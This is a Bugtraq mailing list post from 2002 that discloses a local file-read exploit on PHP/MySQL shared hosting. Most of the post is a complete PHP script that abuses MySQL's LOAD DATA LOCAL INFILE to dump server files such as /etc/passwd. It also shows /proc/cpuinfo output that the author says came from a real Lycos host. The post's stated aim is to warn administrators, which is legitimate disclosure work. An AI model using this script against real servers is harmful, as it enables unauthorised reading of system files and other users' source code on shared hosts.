Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

File reading vulnerable in PHP and MySQL (Local Exploit)

From: Hai Nam Luke <hainamluke () hotmail com>
Date: 26 Nov 2002 10:57:52 -0000


Attacker can use PHP and mySQL to read some local file following this way:

# Create a database (mySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)

======================================================
<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view 

// shell code
        echo "<pre>";

                                mysql_connect ($dbhost, $dbuser, 
$dbpasswd);
                                $sql = array (
                                   "USE $dbname",

                                   'CREATE TEMPORARY TABLE ' . ($tbl 
= 'A'.time
()) . ' (a LONGBLOB)',

                                   "LOAD DATA LOCAL INFILE '$file' INTO 
TABLE
$tbl FIELDS "
                                   . "TERMINATED BY      
'__THIS_NEVER_HAPPENS__' "
                                   . "ESCAPED BY          '' "
                                   . "LINES TERMINATED BY
'__THIS_NEVER_HAPPENS__'",

                                   "SELECT a FROM $tbl LIMIT 1"
                                );


                                foreach ($sql as $statement) {
                                   $query = mysql_query ($statement);

                                   if ($query == false) die (
                                      "FAILED: " . $statement . "\n" .
                                      "REASON: " . mysql_error () . "\n"
                                   );

                                   if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;

                                   echo htmlspecialchars($r[0]);
                                   mysql_free_result ($query);
                                }
    echo "</pre>";
?>

======================================================

You'll recived all source of /etc/passwd

This vulnerable is very dangerous because user can read some important 
file in your server. Especially, at any free host, user can use local 
exploit to read source code of other user and attack one another.

Example: I uploaded this file and config it at http://members.lycos.co.uk/ 
and I
was recived their file: "/proc/cpuinfo" :

==============================================================
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 8
model name      : Pentium III (Coppermine)
stepping        : 10
cpu MHz         : 997.531
cache size      : 256 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 2
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca 
cmov pat pse36
mmx fxsr sse
bogomips        : 1992.29

processor       : 1
vendor_id       : GenuineIntel
cpu family      : 6
model           : 8
model name      : Pentium III (Coppermine)
stepping        : 10
cpu MHz         : 997.531
cache size      : 256 KB
fdiv_bug        : no
hlt_bug         : no
f00f_bug        : no
coma_bug        : no
fpu             : yes
fpu_exception   : yes
cpuid level     : 2
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca 
cmov pat pse36
mmx fxsr sse
bogomips        : 1992.29
==============================================================

And many another files, please check your server !
Thank to dodo. Sorry for my poor English !

Luke (HVA)
http://www.hackervn.net
Previous By Date Next
Previous By Thread Next

Current thread: